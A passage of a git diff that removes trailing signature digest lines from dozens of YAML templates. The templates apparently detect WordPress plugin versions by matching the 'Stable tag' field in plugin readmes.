a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index fdc8369f81..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207678e4bcbd37d756b2b3ed9aab7bb0668a31fe12fbfc6be64f9a92e585fe1122022100b4a4d4842a58cfe2cd9c615ecd52643c0d76424361fab433b588ffa773b4bacf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 7b76198146..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f806e4044a646d2416e78137007a3331a610d7532b63449d3e11862859fafbcf022100c1e7c7f8ad7c0f95e3c184b8fc50f63294a7ccb8ecc430ca0ab1f606e4b0f60e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 570533b8ad..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f8b1947e035ae9acc4a74dc35885ab1d8dba7afad3f964e6dc9e9bee39c6ef4102210096d2e38def3d16ba5c73da8bc0fe4a17a78ac219cdf5b4e9308d2005c68cdb39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 4e8732400e..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204cda2599c5bf56c3922547236d778241adcdb9d9a4ba14cf0514b018856d5629022027d53e4a6b229f455bc135356783d076be0465de6cabbcfefac52d4e389ba768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 62fb7f460e..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f76a76932d1a532722644e8a8b9524859349e462d24985a3361b01d904c14d1022100e7fb2b9cc7313879e4539550cafb108e22ac8a2d941e2a26845b89c36e6607eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index f52b808e9b..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d9138dfbf91b5c857c0b00af5aff27ddd5299d9d32704fab615c0325998a08902206313fa7258d031b4007e3f2e8812584e3b875f76c3119d1255b58b38a56a8ef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 82613d7364..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ac8336cd85c9aebf4fd0861946e11801feeb54eeb74f0e490167b1824eaddf43022100f93b32a07aeeade0c19fdbead75a8ddf78708f89af75c737507ce9e3c5694bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index c2f996906b..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ea602b78ea5d60f4220d42798df95302f030243650f8911c279f41ef560a528b022100de53a58d83ccab7aa435ac20614c0aa0fb8fb0fd68f89a7296c0638559619301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 0f7da710e1..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fbbd1f4bbca95820dc10f85a372d516c809aed8325f9b2c575514f8094e9908102200f8248a11624930c4a20fd1632c47be21ae0e9c6f2f6848088566b47a60688ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 9abce49c1a..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008579d7a63822c41103565ec0199d946e8fa099170a35de4ae3534a957d9b4003022100d165faeedf78449053e67729a999055baa40113318377b0811340bebbdfdea15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 7b74e04a10..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eda1c646fd7018e849d31a62ebebe5146964b1e1d44b396bcdb9e0078952e5af022100d796cfcc4f096e381b60364c3f0d5193651d846c0f2824821bdff4ad9d7d8f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index b2c45510bb..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f5360c126897bcfd551d16212f3f0df5b50e42902e964ce4a726a446a912c43a022100a4b0d4afb1e4997d598e8011a0342fef9b504534d97ab8029f1dafee46046350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ffbc6739c6..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022056dbdcc2677cdefa82290c33b5a34414c83694419254064fc447822676d0d04302206ce942c320176cc6a9889dd1d0bab61b224af808d10f2cc793ac8d1d48f0c3c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 89041e366f..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205b4ec5f0caec823e073fe78d2eb6e77119acda731b6e788c544cf3308643add102205663be5a7a97c97deec88316c66e2b0dde04512bc5cc85b182d135f59da9bdcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 2964e86a96..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c25107accc30e5064586c8101eac0fbd25c84eeb850f0e8618f230fdad96f826022100b0d5c00b6ebf52e2c3821c5f1c12442ea898334faabb7a9898ec526851687aab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 221a889736..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210086be3c36ec1503573c87961c176058dcdbb9a194d32d4a281219f443c2ec0c5a02203a1c3639869d6053726da8c490b2f03ec774b40c368bdae5e35e2a545a4fdc60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index dc53f45d52..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aedfbe269348ca55f79add1d6f9426ce35dfdfa0e17b42dfa038c32a91f6bf9d0220736b721be2f42ffc1bed4501c4e9925474df5af464c29c6091def8c7c0dec826:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7c5682c809..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f58c4a918ce969ce8bfedb61e85b995f4743738707cfacc28ebbcb134dc52296022100bbeaf0eebed6982a4838e0f7e31f847004320daf6d8d5546b5a0f3a9fc4a1c58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index aa66ac7b4d..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009a3e9ee79d7afa1078172028a520b56c322a0229a0148479daf67cef7de854c6022100ab36ceaf31eaf9bff6d4fd62744ef155a405e81b87de7cbc30f4844f695bc035:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1ef73370b2..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009cf17c2ff3f69a28d8448cc9ed094479fac11a0a85dd188433668beace03ef22022100a904e90daab1e5902ec29a787d0c9bcaa0b74221d87c4293f1c93bc667e56b06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 5c797bc046..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220195aa609297a70cdec82bae43633fb248582f448e4af1497f8187914a1b901600221009484c9c537b02862d0c79cca7ee8da546ca639e6b1f5b199957c135e17624926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 6971bdb371..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202ac37b06437a8c0b254a529a4b463055f0e315d165023000a0e016af055e9df102207d20fe501499e340ba7b7785c8df00f9062123540d513a72eb001aa2f7236f3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 3c61f4d06d..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204bab53f66d6654eafe50dfcf335b2f7a136c20ff214ae07738fc446b631813e50221008f99bad0d6c7ef44d5682ba71adf38e2a07166d8d90224815efd8c53c884894d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 59889b409b..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210095dd914cb85c671907b9a4fb7c83d3f8986a941d6653c1442cd0a086cf7b34ac0220350c9359831911563befb47951b315e4e52c02d9ead929a7612126401944b5e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index aafab90e0c..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a54ff84e61c29e924d9c86f639ebbcd6c10b5dea3a84026fe27f7e3a3ebef4b0220713f94e4d6e542c14b1ce050ad245388afd4639f25bd403c5c20bbdce01d4633:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index a75dbb6236..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bf27f0e05260075398d070a1c22937ab2fc3c6b25ef06b55a919f3d1d1a5b36022100c8c67119a9497831213c4f542192f34c5b5761d2ec81dd2901fe1ce41581d3ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index cf8bcb79fd..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a95582cb64417f7b3d9cba24838eeb6b5beb21d0106891fd66d196081b55f69022034410c0d1bee8f8b523198b3f48bb23a23be33cd1b445c23eddbcdfcf46fe05b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a2f0d91031..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008571bf75761896cc3e32c570d9439565f5c94d6657dcaef75cd3bae722c917a2022100ba3a297b12fea8616bca5ca13f251a66ebcf160e275af72410a66ece14bf3b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 80c2f00944..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022001074057f1a77be07e9e11de8e89a78782b1f86321ece5d5ab8e18ccc04182780221008c9fb54968166331aabfbb8f0fabf4f22c5bba6c7afdb3d884c9b8b0eb5d6f57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 6da3057482..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203458ed2411d3e09de235ab6d9f6d1819876b4929635be8e4d63856c0344bdff3022001c6f95755b82c102fbb7190a9ae9e6c367e746d904406f3918ca3454e53f2db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 98a1a304f0..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220358b1c9c323b453c8405de4e90584ffc23835e56b1492e19d901a0c225ff5b1f02202a68f1ca88ea30ea711985873a3d60ad104361a98eb05e58ab4f549a326d7d78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 36cd7e1096..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220481bb78447d72011c753efae3030e89e0a7b2f32745640891f2a727f83b3340b022100ccde27b0981bca1d208e79e25d370b5765f01b51f547e1f03e1c1c8e8c71ae1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 6d225e0c19..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100817f206b4aee61461ff7063a1a49c359c90c29754a2f9712548f8cd38d249c9c02200b9619285427d8bb72f6c476ab151cc59a21de61c3374e6a4f47ca0d9236a880:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 8cd7dc3cff..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210093fd63a907d04775c2fff14021ec21ea518202d68e4a508db9830dcb641d92d302203d57cd4838101055bd50e192619339931e578d79fad1acecd3a0531c7428df46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 31fd7da734..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220145abda145081cd025cafeb02ffe8b25b9c65b9ac9c79a96e869f07cd98306d2022100db4130216ed07f4d23d10854ab250c7951293a5b78ea560409ae62512276eece:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 1944589cef..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c34386ad3e7d2fa05e7193708b3b615dbe85e9fa90c477420854b46cc18796a6022046926de8000180fe6eac5161ba65db86c0c1710e9857f8f0041365a0b090b6fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 86b30179af..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bc065c3448bc19fb0b8c0f99f0540d32f700ad0e0c8a505f85ddef1d44beb1fe0221009ab5265d069255448d0a0e0a6e18c6e240862d65844261074378efde39ad5d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 1d9ebed7a2..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ca4f080494377da142a361ba5417ba5f737f74518054b33a289965d3ea35c12022100d1dbe68b667925d19f86589398e6940ddbbecec4259314259bcf4bc5f1c13bc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index f41b3e44fb..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203fcafd0b26f9a72a6d1d034899ebff57a3c1bc1f5951265c20768b7a48543c450221009c45d0b6876e4b009b5c73bcb222f0d516dea8ac09eb58bf55db422ce3b13126:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 5dab1d26a9..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205ddc3366b2c3c0f7a7a6fbf4cb1c7ba558be295fc6e221677897375bcdd6277e02206493a5e22d0a0aebe734fd013ffcd411792d5eb663673d8a12f04d6fef097856:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 5105335118..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eab9b7c345abcfd08c15aed8507e4890648bdd01621cd54d76e0dd69318dd4eb02200687e25c24962f4a916fff062c65309248527b1723db49f30d36784ef155165a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 4015c5b404..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203af773aa9bbea5ea15f83badce9492984b30cc87f8007143e7fa84b027d9fbcc02205d398eb936ad76abf195f4b0168a22127307e23c3fb6a430ec738f9f2b19b0d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 07bda0ff37..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db5d74e31c89593d60b2178727aae452564ad04fe2b9a79fd035f69fae9dc3a402205638792de73a006b8032c8441fb43c0c72d76e348ea51abbcabf2ab2a7ac4e4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index ed81ecd29e..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045cff2ed6a9f901901c8eb6b0284b49f0c2b39ae0bd78b3e0e83beb489914c75022039e60de1f1287e4750d23565bccb3cc27dbfa289e56578903c37239572665121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 294bd0577c..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009d11626861d7b45ebe9804fcb12eb4ea3712ec15f19c4e612379d48ccb03358f02201e2234f580233f14f5758fcfcdc3afad8fc9b83c12e556bc1fedaf7425546cb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 8d3d9c1c66..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f5575ec104a1b11a642de003780d34f048577ad877ede8694bc4a94ec9c5096302203c06fac7ee82d9f4d6f436bf2c641c51e3401b48344640ff9fdcb80f8ae2b051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index dbb54d7f3d..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203c274bfb75d2140d7aa77dd096356115fe6a80e13de62b239a3d41319143208c022100db4d06036be41b548995072f3d98af31d3ff253193c8c61dfe39e9bf1a707371:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index b78b22021b..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - 